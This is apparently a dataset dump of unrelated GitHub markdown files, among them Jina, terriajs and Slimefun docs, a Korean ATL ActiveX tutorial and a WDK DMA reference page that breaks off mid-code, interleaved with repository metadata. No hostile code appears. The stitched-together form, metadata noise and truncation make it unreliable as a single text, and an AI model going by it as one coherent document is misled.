] | 15,179 | 2020-04-28T10:23:56.000Z | 2022-03-31T14:35:25.000Z | docs/get-started/hello-world/fashion.md | manavshah123/jina | f18b04eb82d18a3c554e2892bbae4b95fc0cb13e | [
"Apache-2.0"
] | 3,912 | 2020-04-28T13:01:29.000Z | 2022-03-31T14:36:46.000Z | docs/get-started/hello-world/fashion.md | manavshah123/jina | f18b04eb82d18a3c554e2892bbae4b95fc0cb13e | [
"Apache-2.0"
] | 1,955 | 2020-04-28T10:50:49.000Z | 2022-03-31T12:28:34.000Z | # Fashion image search
A simple image neural search demo for [Fashion-MNIST](https://hanxiao.io/2018/09/28/Fashion-MNIST-Year-In-Review/). No
extra dependencies needed, simply run:
```bash
jina hello fashion
```
````{tip}
...or even easier for Docker users, **no install required**:
```bash
docker run -v "$(pwd)/j:/j" jinaai/jina hello fashion --workdir /j && open j/hello-world.html
replace "open" with "xdg-open" on Linux
```
````
```{figure} ../../../.github/2.0/hello-fashion-1.png
:align: center
```
This downloads the Fashion-MNIST training and test dataset and tells Jina to index 60,000 images from the training set.
Then it randomly samples images from the test set as queries and asks Jina to retrieve relevant results.
The whole process takes about 1 minute.
```{figure} ../../../.github/2.0/hello-fashion-2.png
:align: center
``` | 28.366667 | 119 | 0.707403 | eng_Latn | 0.719673 |
fa72ac19ab6f85261e0b1faa15a292b82e5e98a4 | 487 | md | Markdown | README.md | bioretics/terriajs | b4f1980d427be0ac79ac8c9cd18669941cd31576 | [
"Apache-2.0"
] | null | null | null | README.md | bioretics/terriajs | b4f1980d427be0ac79ac8c9cd18669941cd31576 | [
"Apache-2.0"
] | null | null | null | README.md | bioretics/terriajs | b4f1980d427be0ac79ac8c9cd18669941cd31576 | [
"Apache-2.0"
] | null | null | null |
rer3d-terriajs
============



**rer3d-terriajs** is a fork of [TerriaJS](https://github.com/TerriaJS/terriajs) with improvements and customization for _Regione Emilia-Romagna_. It is a dependency of [rer3d-map](https://github.com/bioretics/rer3d-map).
| 48.7 | 221 | 0.7577 | kor_Hang | 0.16533 |
fa737ff79e303d9339d86bb1a7b4871a36ec6c39 | 353 | md | Markdown | main/day00/README.md | ellldar/42_school_piscine | d813d5504e529584272469b8714d006a93cecb1b | [
"MIT"
] | null | null | null | main/day00/README.md | ellldar/42_school_piscine | d813d5504e529584272469b8714d006a93cecb1b | [
"MIT"
] | null | null | null | main/day00/README.md | ellldar/42_school_piscine | d813d5504e529584272469b8714d006a93cecb1b | [
"MIT"
] | null | null | null | ## WIP : Day00 is in progress.
I am missing the subject file for this day.
Made some inquiries to my fellow pisciners. Will add and modify the files as soon as I get the right PDF file.
Updates are coming...
### How did I do?
<img src="screenshot.png" alt="Day00 Score Sheet" width="700"/>
So, for all the `OK` exercises you can look for reference
| 27.153846 | 110 | 0.72238 | eng_Latn | 0.98789 |
fa747138037403332a94bb663cc30134fcf6a714 | 27 | md | Markdown | README.md | james-aprimo/aprimo-inriver-starterkit | dedd5195d429eac512cd17aade28bcafc95c7088 | [
"BSD-3-Clause"
] | null | null | null | README.md | james-aprimo/aprimo-inriver-starterkit | dedd5195d429eac512cd17aade28bcafc95c7088 | [
"BSD-3-Clause"
] | null | null | null | README.md | james-aprimo/aprimo-inriver-starterkit | dedd5195d429eac512cd17aade28bcafc95c7088 | [
"BSD-3-Clause"
] | null | null | null | # aprimo-inriver-starterkit | 27 | 27 | 0.851852 | nob_Latn | 0.386238 |
fa752ef45d3d9a9647378eb8d32cc06f961f337c | 309 | md | Markdown | pages/Magnesium-Dust.md | haiman233/Slimefun-Wiki | 611266cb91a61de5a0a66703a7b96d84211c20c7 | [
"MIT"
] | 3 | 2022-01-05T05:49:54.000Z | 2022-02-02T09:47:54.000Z | pages/Magnesium-Dust.md | haiman233/Slimefun-Wiki | 611266cb91a61de5a0a66703a7b96d84211c20c7 | [
"MIT"
] | 22 | 2021-11-04T15:12:56.000Z | 2022-02-11T21:58:30.000Z | pages/Magnesium-Dust.md | haiman233/Slimefun-Wiki | 611266cb91a61de5a0a66703a7b96d84211c20c7 | [
"MIT"
] | 2 | 2022-02-21T02:38:13.000Z | 2022-03-16T03:33:40.000Z | # 镁粉 :id=magnesium-dust
镁粉是 Slimefun 中的九种[矿粉](/Dusts)之一。
## 获取 :id=obtaining
可以在[洗矿机](/Ore-Washer)或[电动洗矿机](/Electric-Dust-Washer)中处理[筛矿](/Sifted-Ore),有11.1%的几率可以获得镁粉。
## 用途 :id=usage
镁粉可以在[冶炼炉](/Smeltery)或[电动铸锭机](/Electric-Ingot-Factory)中冶炼成[镁锭](/Magnesium-Ingot)。
镁粉可用于合成下列物品:
* [镁盐](/Magnesium-Salt)
| 19.3125 | 89 | 0.702265 | yue_Hant | 0.966262 |
fa7586c832e2d02626f7091ab479de88ea0060e1 | 941 | md | Markdown | README.md | visualspark/wp-broadbean | 87ddd2b8684adcaf8617f768247ddef880e894f3 | [
"MIT"
] | 1 | 2015-09-29T08:23:44.000Z | 2015-09-29T08:23:44.000Z | README.md | visualspark/wp-broadbean | 87ddd2b8684adcaf8617f768247ddef880e894f3 | [
"MIT"
] | null | null | null | README.md | visualspark/wp-broadbean | 87ddd2b8684adcaf8617f768247ddef880e894f3 | [
"MIT"
] | null | null | null | #wp-broadbean
---
Wordpress plugin for Broadbean integration
##Description
Integration with Broadbean Job-adder API. A service is needs to be created from Broadbean.
##Installation
1. Install and unzip plugin
2. Activate the plugin through the 'Plugins' menu in WordPress
3. Create a user that your jobs will be associated to. You can not use an admin account
4. Set the Category and user in Settings -> WP-Broadbean
5. Create service on Broadbeans system to the specs provided with the plugin.
6. Provide Broadbean with URL of plugin and site (on Options page) and the username/password for the API.
##Frequently Asked Questions
*Can I save jobs to different content editors?*
Unfortunately not. Only one set of user credentials can be provided to Broadbean to include with the post to the plugin.
##Future Plans
• Step by step documentation
##Anything else
Please send through any thoughts or update suggestions to the plugin. | 29.40625 | 120 | 0.784272 | eng_Latn | 0.995005 |
fa766f38a37a9c361fb727ad013a9b5bb984e907 | 629 | md | Markdown | CONTRIBUTING.md | piegit/GridLauncher-Night-Edition | 1c9e32e5fe4856f43520dd451827504353d786d9 | [
"MIT"
] | 5 | 2017-06-20T04:39:58.000Z | 2017-07-02T02:05:29.000Z | CONTRIBUTING.md | piegit/GridLauncher-Night-Edition | 1c9e32e5fe4856f43520dd451827504353d786d9 | [
"MIT"
] | 1 | 2019-08-13T22:02:08.000Z | 2019-08-14T20:26:11.000Z | CONTRIBUTING.md | piegit/GridLauncher-Night-Edition | 1c9e32e5fe4856f43520dd451827504353d786d9 | [
"MIT"
] | 3 | 2019-06-22T21:47:10.000Z | 2019-08-13T22:06:48.000Z | When logging issues, please do not just post the issue you are having. I.e. please do not post "the launcher is crashing." It is impossible to diagnose and fix bugs with such limited information. To investigate reported issues, I need ALL of the following information:
* 3DS version (New/Old, XL/normal)
* 3DS region (EUR/USA/JAP/AUS.....)
* Precise FW version
* HB entrypoint used (Cubic Ninja, OOT, homemenuhax, Ironfall.....)
* Hax version (1.1/2.0/2.1/2.5)
* What exactly the problem is and how it can be reproduced
Issues with the updater program should be posted at https://github.com/ihaveamac/mashers-gl-updater/issues
| 57.181818 | 268 | 0.755167 | eng_Latn | 0.991708 |
fa76db72c9c3f646449568a50263087a22beaf6b | 3,662 | md | Markdown | docs/atl/putting-the-control-on-a-web-page-atl-tutorial-part-7.md | drvoss/cpp-docs.ko-kr | dda556c732d97e5959be3b39dc331ded7eda8bb3 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/atl/putting-the-control-on-a-web-page-atl-tutorial-part-7.md | drvoss/cpp-docs.ko-kr | dda556c732d97e5959be3b39dc331ded7eda8bb3 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/atl/putting-the-control-on-a-web-page-atl-tutorial-part-7.md | drvoss/cpp-docs.ko-kr | dda556c732d97e5959be3b39dc331ded7eda8bb3 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: "웹 페이지 (ATL 자습서, 7 부)에 컨트롤 배치 | Microsoft Docs"
ms.custom:
ms.date: 11/04/2016
ms.reviewer:
ms.suite:
ms.technology:
- cpp-windows
ms.tgt_pltfrm:
ms.topic: get-started-article
dev_langs:
- C++
ms.assetid: 50dc4c95-c95b-4006-b88a-9826f7bdb222
caps.latest.revision:
author: mikeblome
ms.author: mblome
manager: ghogen
ms.workload:
- cplusplus
ms.openlocfilehash: 523086c70d9f974c014f5d33a71bf9309b8e017d
ms.sourcegitcommit: 8fa8fdf0fbb4f57950f1e8f4f9b81b4d39ec7d7a
ms.translationtype: MT
ms.contentlocale: ko-KR
ms.lasthandoff: 12/21/2017
---
# <a name="putting-the-control-on-a-web-page-atl-tutorial-part-7"></a>웹 페이지에 컨트롤 배치(ATL 자습서, 7부)
컨트롤이 완성 되었습니다. 실제 상황에서 작동 하 여 컨트롤을 보려면 웹 페이지에 추가 합니다. 컨트롤을 정의할 때 컨트롤을 포함 하는 HTML 파일을 만들었습니다. PolyCtl.htm 파일 열기 **솔루션 탐색기**, 웹 페이지에 컨트롤을 볼 수 있습니다.
이 단계에서는 이벤트에 응답 하는 웹 페이지를 스크립팅할 수 있습니다. 또한 컨트롤 스크립팅을 위해 안전 하 게 보호 되는 Internet Explorer가 컨트롤을 수정 합니다.
## <a name="scripting-the-web-page"></a>웹 페이지 스크립팅
컨트롤이 아무런 작업도 아직 주므로 보내는 이벤트에 응답 하는 웹 페이지를 변경 합니다.
#### <a name="to-script-the-web-page"></a>웹 페이지를 스크립팅하려면
1. PolyCtl.htm 열고 HTML 뷰를 선택 합니다. HTML 코드에 다음 줄을 추가 합니다. 다음 추가 합니다 `</OBJECT>` 하기 전에 `</BODY>`합니다.
```
<SCRIPT LANGUAGE="VBScript">
<!--
Sub PolyCtl_ClickIn(x, y)
PolyCtl.Sides = PolyCtl.Sides + 1
End Sub
Sub PolyCtl_ClickOut(x, y)
PolyCtl.Sides = PolyCtl.Sides - 1
End Sub
-->
</SCRIPT>
```
2. HTM 파일을 저장 합니다.
컨트롤에서 양쪽 속성을 가져오고 컨트롤 내부를 클릭할 경우 면 수를 1 씩 증가 하는 VBScript 코드를 추가 했습니다. 컨트롤의 바깥쪽을 클릭 하면 씩 측면의 수를 줄입니다.
## <a name="indicating-that-the-control-is-safe-for-scripting"></a>컨트롤 스크립트 임을 나타내는
Internet Explorer의 컨트롤을 사용 하 여 웹 페이지를 볼 수 또는 더 편리 하 게 사용 하 여 Visual c + +로 작성 된 웹 브라우저 보기. 웹 브라우저 보기에서 컨트롤을 보려면 PolyCtl.htm을 마우스 오른쪽 단추로 클릭 하 고 클릭 **브라우저에서 보기**합니다.
현재 Internet Explorer 보안 설정에 따라, 나타날 수 있습니다 보안 경고 손상 시킬 대화 상자가 표시 컨트롤 스크립트에 안전 하 게 보호 되지 않을 수 있습니다 및 가능성이 있습니다. 예를 들어, 파일을 표시 하지만 컨트롤을 설치한 경우는 `Delete` 파일을 삭제 하는 메서드를 안전 하 게 보호 되 면 될 수만 페이지에 볼 수 있습니다. 하지만 것이 안전 스크립트를 다른 사용자가 호출할 수 있으므로 `Delete` 메서드.
> [!IMPORTANT]
> 이 자습서에서는 안전한 것으로 표시 되지 않은 ActiveX 컨트롤을 사용 하려면 Internet Explorer에서 보안 설정을 변경할 수 있습니다. 제어판에서 클릭 **인터넷 속성** 클릭 **보안** 적절 한 설정을 변경할 수 있습니다. 이 자습서를 완료 한 때를 원래 상태로 보안 설정을 변경 합니다.
프로그래밍 방식으로이 특정 컨트롤에 대 한 보안 경고 대화 상자를 표시 하려면 필요 하지 않는 Internet Explorer을 알릴 수 있습니다. 이를 수행할 수 있습니다는 `IObjectSafety` 인터페이스 및 ATL 클래스의이 인터페이스의 구현을 제공 [IObjectSafetyImpl](../atl/reference/iobjectsafetyimpl-class.md)합니다. 인터페이스에 있는 컨트롤을 추가 하려면 추가 `IObjectSafetyImpl` 상속 된 클래스 목록에 COM 맵에서 대 한 항목을 추가 합니다.
#### <a name="to-add-iobjectsafetyimpl-to-the-control"></a>IObjectSafetyImpl 컨트롤에 추가 하려면
1. PolyCtl.h에서 상속 된 클래스 목록의 끝에 다음 줄을 추가 하 고 이전 줄으로는 쉼표를 추가 합니다.
[!code-cpp[NVC_ATL_Windowing#62](../atl/codesnippet/cpp/putting-the-control-on-a-web-page-atl-tutorial-part-7_1.h)]
2. COM 드에서를 맵에 PolyCtl.h 다음 줄을 추가 합니다.
[!code-cpp[NVC_ATL_Windowing#63](../atl/codesnippet/cpp/putting-the-control-on-a-web-page-atl-tutorial-part-7_2.h)]
## <a name="building-and-testing-the-control"></a>빌드 및 컨트롤 테스트
컨트롤을 빌드하십시오. 빌드가 완료 되 면 PolyCtl.htm를 다시 브라우저 보기에서 엽니다. 이 이번에 웹 페이지는 보안 경고 대화 상자 없이 직접 표시 해야 합니다. 다각형 내부를 클릭 합니다. 변의 수가 하나 증가합니다. 양쪽의 수를 줄이기 위해 다각형 바깥쪽을 클릭 합니다. 3 개 미만 양쪽의 수를 줄이기 위해 시도 하는 경우 설정 하는 오류 메시지가 표시 됩니다.
[6 단계 이동](../atl/adding-a-property-page-atl-tutorial-part-6.md)
## <a name="next-steps"></a>다음 단계
ATL 자습서를 완료 했습니다. ATL에 대 한 자세한 정보에 대 한 링크를 참조 하십시오.는 [ATL 시작 페이지](../atl/active-template-library-atl-concepts.md)합니다.
## <a name="see-also"></a>참고 항목
[자습서](../atl/active-template-library-atl-tutorial.md)
| 42.091954 | 299 | 0.678591 | kor_Hang | 1.00001 |
fa77044942a6d025e232e2586949038a35772f1e | 280 | md | Markdown | README.md | dzyls/serializable-thread-pool-reject-handler | f9b6878798043568a7f36671786ff3e89a63ea5b | [
"Apache-2.0"
] | null | null | null | README.md | dzyls/serializable-thread-pool-reject-handler | f9b6878798043568a7f36671786ff3e89a63ea5b | [
"Apache-2.0"
] | null | null | null | README.md | dzyls/serializable-thread-pool-reject-handler | f9b6878798043568a7f36671786ff3e89a63ea5b | [
"Apache-2.0"
] | null | null | null | Java的线程池有四个拒绝策略:
- AbortPolicy
- DiscardPolicy
- DiscardOldestPolicy
- CallerRunsPolicy
无论是哪一种的拒绝策略,都有着自己的缺点。
如果任务是有状态的话,丢弃线程,可能会造成重要的数据丢失。
因此jdk提供的四种拒绝策略,有些情况下并不能满足需求。
对待这种有状态的任务,正确的姿势应该是使用MQ做异步,同时确保消息幂等性。
如果系统内没有使用MQ,那么就需要自定义拒绝策略 :将有状态的任务持久化【到数据库或者Redis、文件】,等待线程池空闲时再执行。
| 15.555556 | 65 | 0.842857 | yue_Hant | 0.679123 |
fa7739e99f884c887d28b964f7f514377a621924 | 4,461 | md | Markdown | scripting-docs/winscript/reference/iactivescript-addnameditem.md | monkey3310/visualstudio-docs.pl-pl | adc80e0d3bef9965253897b72971ccb1a3781354 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | scripting-docs/winscript/reference/iactivescript-addnameditem.md | monkey3310/visualstudio-docs.pl-pl | adc80e0d3bef9965253897b72971ccb1a3781354 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | scripting-docs/winscript/reference/iactivescript-addnameditem.md | monkey3310/visualstudio-docs.pl-pl | adc80e0d3bef9965253897b72971ccb1a3781354 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: IActiveScript::AddNamedItem | Dokumentacja firmy Microsoft
ms.custom: ''
ms.date: 01/18/2017
ms.prod: windows-script-interfaces
ms.reviewer: ''
ms.suite: ''
ms.tgt_pltfrm: ''
ms.topic: reference
apiname:
- IActiveScript.AddNamedItem
apilocation:
- scrobj.dll
helpviewer_keywords:
- AddNamedItem method, IActiveScript interface
ms.assetid: a7c6317d-948f-4bb3-b169-1bbe5b7c7cc5
caps.latest.revision: 8
author: mikejo5000
ms.author: mikejo
manager: ghogen
ms.openlocfilehash: db65361e4bde14e803d9085a4530a505ccaf9fcb
ms.sourcegitcommit: aadb9588877418b8b55a5612c1d3842d4520ca4c
ms.translationtype: MT
ms.contentlocale: pl-PL
ms.lasthandoff: 10/27/2017
ms.locfileid: "24792136"
---
# <a name="iactivescriptaddnameditem"></a>IActiveScript::AddNamedItem
Dodaje nazwę elementu głównego poziomu do przestrzeni nazw aparatu skryptów. Element poziomu głównego jest obiekt o właściwości i metody, źródłem zdarzenia lub wszystkich trzech.
## <a name="syntax"></a>Składnia
```
HRESULT AddNamedItem(
LPCOLESTR pstrName, // address of item name
DWORD dwFlags // item flags
);
```
#### <a name="parameters"></a>Parametry
`pstrName`
[in] Adres buforu, który zawiera nazwę elementu, tak jak to pokazano w skrypcie. Nazwa musi być unikatowa i możliwy do utrwalenia.
`dwFlags`
[in] Flagi skojarzone z elementem. Może być kombinacją tych wartości:
|Wartość|Znaczenie|
|-----------|-------------|
|SCRIPTITEM_CODEONLY|Wskazuje, czy nazwany element reprezentuje obiekt tylko kod i host nie ma `IUnknown` ma zostać skojarzony z tym obiektem tylko kod. Host zawiera tylko nazwę dla tego obiektu. Zorientowane obiektowo języków, takich jak C++ ta flaga utworzyć klasę. Nie obsługuje wszystkich języków tej flagi.|
|SCRIPTITEM_GLOBALMEMBERS|Wskazuje, że element jest kolekcja globalnych właściwości i metod skojarzonych ze skryptem. Zwykle aparat skryptów rozróżnia nazwę obiektu (innych niż wyłącznie w celu używania go jako plik cookie dla [IActiveScriptSite::GetItemInfo](../../winscript/reference/iactivescriptsite-getiteminfo.md) metody, lub w celu rozwiązania jawnego określania zakresu) i udostępnianie jej elementów członkowskich jako globalnego zmienne i metody. Umożliwia to hostowi rozszerzanie biblioteki (funkcje wykonawcze języka i tak dalej) dla skryptu. Zostanie pozostawiony do aparatu skryptów radzenia sobie z nazwa powoduje konflikt (na przykład, jeśli dwa elementy SCRIPTITEM_GLOBALMEMBERS mają metody o tej samej nazwie), chociaż nie powinien być zwracany błąd z powodu tej sytuacji.|
|SCRIPTITEM_ISPERSISTENT|Wskazuje, czy element powinien być zapisany, zapisanie aparatu skryptów. Podobnie, ustawienie ta flaga wskazuje, że przejście do stanu zainicjowane powinien zachować elementu nazwę i typ informacji (aparat skryptów jednak wszystkie wskaźniki prowadzące do interfejsów rzeczywistego obiektu).|
|SCRIPTITEM_ISSOURCE|Wskazuje, że element źródłem zdarzeń, które skrypt może sink. Obiekty podrzędne (właściwości obiektu znajdujących się w samych obiektów) można także źródła zdarzeń do skryptu. Nie jest cykliczne, ale na przykład zapewnia mechanizm wygodny w typowych przypadkach tworzenia kontenera i wszystkich jego elementów członkowskich kontrolki.|
|SCRIPTITEM_ISVISIBLE|Wskazuje, że nazwa elementu jest dostępne w przestrzeni nazw skrypt umożliwiający dostęp do właściwości, metod i zdarzeń elementu. Konwencja właściwości elementu obejmują elementy podrzędne elementu; w związku z tym wszystkie właściwości obiektu podrzędnego i metody (i ich elementy podrzędne, rekursywnie) będą dostępne.|
|SCRIPTITEM_NOCODE|Wskazuje, że element jest po prostu nazwę dodawane do skryptu obszar nazw i nie powinien być traktowany jako element, dla którego kod powinien być skojarzony. Na przykład bez ta flaga jest ustawiona, VBScript utworzy oddzielnego modułu o nazwie elementu i C++ może utworzyć klasy otoki osobne dla nazwanego elementu.|
## <a name="return-value"></a>Wartość zwracana
Zwraca jedną z następujących wartości:
|Wartość zwracana|Znaczenie|
|------------------|-------------|
|`S_OK`|Powodzenie.|
|`E_INVALIDARG`|Argument był nieprawidłowy.|
|`E_POINTER`|Określono nieprawidłowy wskaźnik.|
|`E_UNEXPECTED`|Nie oczekiwano wywołania (na przykład aparatu skryptów jeszcze nie został załadowany lub zainicjować).|
## <a name="see-also"></a>Zobacz też
[IActiveScript](../../winscript/reference/iactivescript.md) | 66.58209 | 793 | 0.781215 | pol_Latn | 0.999777 |
fa7798fb82da0b6ae87e08b65b6794e01ec2443d | 4,979 | md | Markdown | README.md | getHarsh/getHarsh | 35fb22dab3fdda81b5960bdb3df88e631564c07c | [
"MIT"
] | null | null | null | README.md | getHarsh/getHarsh | 35fb22dab3fdda81b5960bdb3df88e631564c07c | [
"MIT"
] | null | null | null | README.md | getHarsh/getHarsh | 35fb22dab3fdda81b5960bdb3df88e631564c07c | [
"MIT"
] | 1 | 2021-07-26T18:23:26.000Z | 2021-07-26T18:23:26.000Z | # getHarsh
## Table of contents
- Technology stack used
- What's included
- Documentation
## Technology stack used
1. Python3 3.2.0
2. Django Web Framework 3.1.7
3. [Wagtail CMS](https://wagtail.io) for content administration.
4. [PostgreSQL 10.5](https://www.postgresql.org/) is the database we use in production and locally.
5. [Psycopg](http://initd.org/psycopg/) is the Python library that lets Python talk to Postgres.
6. [Amazon S3](https://aws.amazon.com/free/?all-free-tier.sort-by=item.additionalFields.SortRank&all-free-tier.sort-order=asc&awsf.Free%20Tier%20Categories=categories%23storage&trk=ps_a134p000006gEXGAA2&trkCampaign=acq_paid_search_brand&sc_channel=PS&sc_campaign=acquisition_IN&sc_publisher=Google&sc_category=Storage&sc_country=IN&sc_geo=APAC&sc_outcome=acq&sc_detail=amazon%20s3&sc_content=S3_e&sc_matchtype=e&sc_segment=477000700292&sc_medium=ACQ-P|PS-GO|Brand|Desktop|SU|Storage|S3|IN|EN|Text&s_kwcid=AL!4422!3!477000700292!e!!g!!amazon%20s3&ef_id=CjwKCAjwuvmHBhAxEiwAWAYj-MxGign8CZZzAQNFFMiCQBwdTWVkAFHM6HG8qd6BlOARAYn6iKEJGRoCFWUQAvD_BwE:G:s&s_kwcid=AL!4422!3!477000700292!e!!g!!amazon%20s3&awsf.Free%20Tier%20Types=*all) provides object storage through a web service
7. interface
8. [Gunicorn](https://gunicorn.org/#docs) interface between nginx and Django
9. [Lightsail](https://aws.amazon.com/lightsail/) offers you everything needed to build an application or website
10. [Route53](https://aws.amazon.com/route53/) instance between instance ip and go daddy
11. [Certbot](https://certbot.eff.org/) for ssl certificate
## What's included
Within the download you'll find the following directories and files, logically grouping common assets and providing both compiled and minified variations. You'll see something like this:
```markdown
GETHARSH/
├──blog/
│ ├── __init.py__
│ ├── admin.py
│ ├── apps.py
│ ├── feeds.py
│ ├── forms.py
│ ├── models.py
│ ├── tests.py
│ ├── urls.py
│ ├── views.py
│ ├── wagtail_hooks.py
├──blog_extension/
│ ├── __init.py__
│ ├── admin.py
│ ├── apps.py
│ ├── forms.py
│ ├── models.py
│ ├── tests.py
│ ├── urls.py
│ ├── views.py
├──cmswagtail/
│ ├── __init.py__
│ ├── settings/
│ │ ├── __init.py__
│ │ ├── base.py
│ │ ├── dev.py
│ │ ├── production.py
│ ├── static/
│ ├── templates/
│ ├── __init__.py
│ ├── urls.py
│ ├── wsgi.py
├──home/
│ ├── __init__.py
│ ├── context_processors.py
│ ├── models.py
├──search/
│ ├── __init__.py
│ ├── views.py
├──user_management/
│ ├── __init.py__
│ ├── admin.py
│ ├── apps.py
│ ├── forms.py
│ ├── models.py
│ ├── signals.py
│ ├── tests.py
│ ├── views.py
├──manage.py/
```
Static contains static files(like css, js and media), templates contain the html pages. For further information visit [Django documentation](https://docs.djangoproject.com/en/3.2/).
#### For further information on various .py files:
- admin.py file is used to display your models in the Django admin panel. You can also customize your admin panel.
- manage.py is Django’s command-line utility for administrative tasks, click [here](https://docs.djangoproject.com/en/3.2/ref/django-admin/) for more info
feeds.py is used for creating RSS Feeds with Django, click [here](https://docs.djangoproject.com/en/3.2/ref/contrib/syndication/) for more info
- forms.py is used for creating custom forms through models, click [here](https://docs.djangoproject.com/en/3.2/topics/forms/) for more info
- models.py is the single, definitive source of information about your data, click [here](https://docs.djangoproject.com/en/3.2/topics/db/models/) for more info
- urls.py is used for handling urls on website, click [here](https://docs.djangoproject.com/en/3.2/topics/http/urls/) for more info
- views.py contains Python function **that takes a Web request and returns a Web response**, click [here](https://docs.djangoproject.com/en/3.2/topics/http/views/) for more info
- base.py contains the settings of the project through which the website runs, click [here](https://docs.djangoproject.com/en/3.2/topics/settings/) for more info
- wsgi.py contains calling convention for web servers to forward requests to web applications or frameworks written in the **Python** programming language. click [here](https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/) for more info
## Documentation
Here is a flow chart of how the project works

### Installation and configuration
Clone the repository
Using the console, navigate to the root directory in which your projects live and clone this project's repository:
```bash
git clone git@github.com:getHarsh/getHarsh.git
cd getHarsh
// make your python virtualenv
virtualenv -p python3 virtualenv
source virtualenv/bin/activate
```
with virtualenv activated and inside the project directory
```
pip install -r requirements.txt
./manage.py migrate
./manage.py createsuperuser
./manage.py runserver
```
| 39.832 | 774 | 0.727455 | eng_Latn | 0.830779 |
fa790ae8a8e11cc7b7a28a48366dae41121bf378 | 6,352 | md | Markdown | wdk-ddi-src/content/wdfdmatransaction/nf-wdfdmatransaction-wdfdmatransactiondmacompletedwithlength.md | kein284/windows-driver-docs-ddi | 3b70e03c2ddd9d8d531f4dc2fb9a4bb481b7dd54 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | wdk-ddi-src/content/wdfdmatransaction/nf-wdfdmatransaction-wdfdmatransactiondmacompletedwithlength.md | kein284/windows-driver-docs-ddi | 3b70e03c2ddd9d8d531f4dc2fb9a4bb481b7dd54 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | wdk-ddi-src/content/wdfdmatransaction/nf-wdfdmatransaction-wdfdmatransactiondmacompletedwithlength.md | kein284/windows-driver-docs-ddi | 3b70e03c2ddd9d8d531f4dc2fb9a4bb481b7dd54 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
UID: NF:wdfdmatransaction.WdfDmaTransactionDmaCompletedWithLength
title: WdfDmaTransactionDmaCompletedWithLength function (wdfdmatransaction.h)
description: The WdfDmaTransactionDmaCompletedWithLength method notifies the framework that a device's DMA transfer operation is complete and supplies the length of the completed transfer.
old-location: wdf\wdfdmatransactiondmacompletedwithlength.htm
tech.root: wdf
ms.assetid: 7f436ac1-1e36-449c-a23f-b5729e5a20c2
ms.date: 02/26/2018
keywords: ["WdfDmaTransactionDmaCompletedWithLength function"]
ms.keywords: DFDmaObjectRef_b04fb6c6-98ce-4d3b-8bc9-10a29f6bde46.xml, WdfDmaTransactionDmaCompletedWithLength, WdfDmaTransactionDmaCompletedWithLength method, kmdf.wdfdmatransactiondmacompletedwithlength, wdf.wdfdmatransactiondmacompletedwithlength, wdfdmatransaction/WdfDmaTransactionDmaCompletedWithLength
req.header: wdfdmatransaction.h
req.include-header: Wdf.h
req.target-type: Universal
req.target-min-winverclnt:
req.target-min-winversvr:
req.kmdf-ver: 1.0
req.umdf-ver:
req.ddi-compliance: DriverCreate, KmdfIrql, KmdfIrql2
req.unicode-ansi:
req.idl:
req.max-support:
req.namespace:
req.assembly:
req.type-library:
req.lib: Wdf01000.sys (see Framework Library Versioning.)
req.dll:
req.irql: <=DISPATCH_LEVEL
targetos: Windows
req.typenames:
f1_keywords:
- WdfDmaTransactionDmaCompletedWithLength
- wdfdmatransaction/WdfDmaTransactionDmaCompletedWithLength
topic_type:
- APIRef
- kbSyntax
api_type:
- LibDef
api_location:
- Wdf01000.sys
- Wdf01000.sys.dll
api_name:
- WdfDmaTransactionDmaCompletedWithLength
---
# WdfDmaTransactionDmaCompletedWithLength function
## -description
<p class="CCE_Message">[Applies to KMDF only]</p>
The <b>WdfDmaTransactionDmaCompletedWithLength</b> method notifies the framework that a device's DMA transfer operation is complete and supplies the length of the completed transfer.
## -parameters
### -param DmaTransaction
[in]
A handle to a DMA transaction object that the driver obtained from a previous call to <a href="https://docs.microsoft.com/windows-hardware/drivers/ddi/wdfdmatransaction/nf-wdfdmatransaction-wdfdmatransactioncreate">WdfDmaTransactionCreate</a>.
### -param TransferredLength
[in]
The number of bytes that the device transferred in the current DMA transfer.
### -param Status
[out]
A pointer to a location that receives the status of the DMA transfer. For more information, see the Remarks section for <a href="https://docs.microsoft.com/windows-hardware/drivers/ddi/wdfdmatransaction/nf-wdfdmatransaction-wdfdmatransactiondmacompleted">WdfDmaTransactionDmaCompleted</a>.
## -returns
<b>WdfDmaTransactionDmaCompletedWithLength</b> returns <b>FALSE</b> and <i>Status</i> receives STATUS_MORE_PROCESSING_REQUIRED if additional transfers are needed to complete the DMA transaction. The method returns <b>TRUE</b> if no additional transfers are required.
A bug check occurs if the driver supplies an invalid object handle.
## -remarks
When your driver calls the <b>WdfDmaTransactionDmaCompletedWithLength</b> method, the framework ends the current transfer and, if necessary, starts a new one.
The <b>WdfDmaTransactionDmaCompletedWithLength</b> method behaves the same as <a href="https://docs.microsoft.com/windows-hardware/drivers/ddi/wdfdmatransaction/nf-wdfdmatransaction-wdfdmatransactiondmacompleted">WdfDmaTransactionDmaCompleted</a>, except that drivers call <b>WdfDmaTransactionDmaCompletedWithLength</b> for devices that report the number of bytes that were transferred. The framework uses the reported byte count to determine the beginning of the next DMA transfer for the specified DMA transaction, if multiple transfers are needed to complete the transaction.
For more information about completing DMA transfers, see <a href="https://docs.microsoft.com/windows-hardware/drivers/wdf/completing-a-dma-transfer">Completing a DMA Transfer</a>.
#### Examples
The following code example is from the <a href="https://docs.microsoft.com/windows-hardware/drivers/wdf/sample-kmdf-drivers">PLX9x5x</a> sample driver. This example calls <a href="https://docs.microsoft.com/windows-hardware/drivers/ddi/wdfdmatransaction/nf-wdfdmatransaction-wdfdmatransactiongetcurrentdmatransferlength">WdfDmaTransactionGetCurrentDmaTransferLength</a> to determine the current transfer's original length, and then it calculates the actual transfer length. Next, the example calls <b>WdfDmaTransactionDmaCompletedWithLength</b> to report the actual transfer length to the framework. If the current transfer is the last one for the transaction, the example calls a private routine that completes the I/O request.
```cpp
BOOLEAN hasTransitioned;
PDMA_TRANSFER_ELEMENT dteVA;
ULONG length;
//
// Use "DMA Clear-Count Mode" to get the complementary
// transferred byte count.
//
length = WdfDmaTransactionGetCurrentDmaTransferLength(dmaTransaction);
